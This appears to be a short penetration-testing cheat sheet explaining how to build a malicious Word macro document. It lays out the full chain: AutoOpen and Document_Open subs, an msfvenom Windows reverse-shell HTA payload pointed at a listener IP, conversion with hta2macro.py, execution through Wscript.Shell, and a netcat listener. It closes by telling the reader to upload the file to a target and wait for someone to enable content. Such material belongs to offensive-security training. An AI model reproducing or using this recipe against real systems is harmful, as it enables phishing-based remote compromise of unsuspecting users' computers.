Macro
Preparation
Install Office.
Create a Word document, called Evil.doc.
Open a Macros from View menu. Select 'Evil' document in Macros in:

Insert your macro name, 'MyMacro' in the Macro name: and then click 'Create'

This will take you to a VB editor.

Add the following script to your new macro.
Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub

Create a reverse shell payload with hta extension via msfvenom
# Kali
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.128 LPORT=1234 -f hta-psh -o evil.hta
Make them readable with a python script. Download
hta2macro.py
.
# Kali
python hta2macro.py evil.hta

Copy the split string to the Macro and add some commands in the Macro.
# Office Macro Editor
Dim Str As String
<Your string here>
CreateObject("Wscript.Shell").Run Str
End Sub


and save it as Word 97 format.
When you check the macro again, you see the following scripts.

Set up a netcat listener to validate your macro to work.
# Kali
nc -nlvp 1234
Open the word document.

Click Enable Content.
Kali machine, you will see the connection.

Execution
Check your macro
# Kali
sudo pip install -U oletools
olevba evil.doc
# Check if your macro exists

Set up a netcat listener again, upload the document to your target location, and wait until someone opens the document and enable content.
Last updated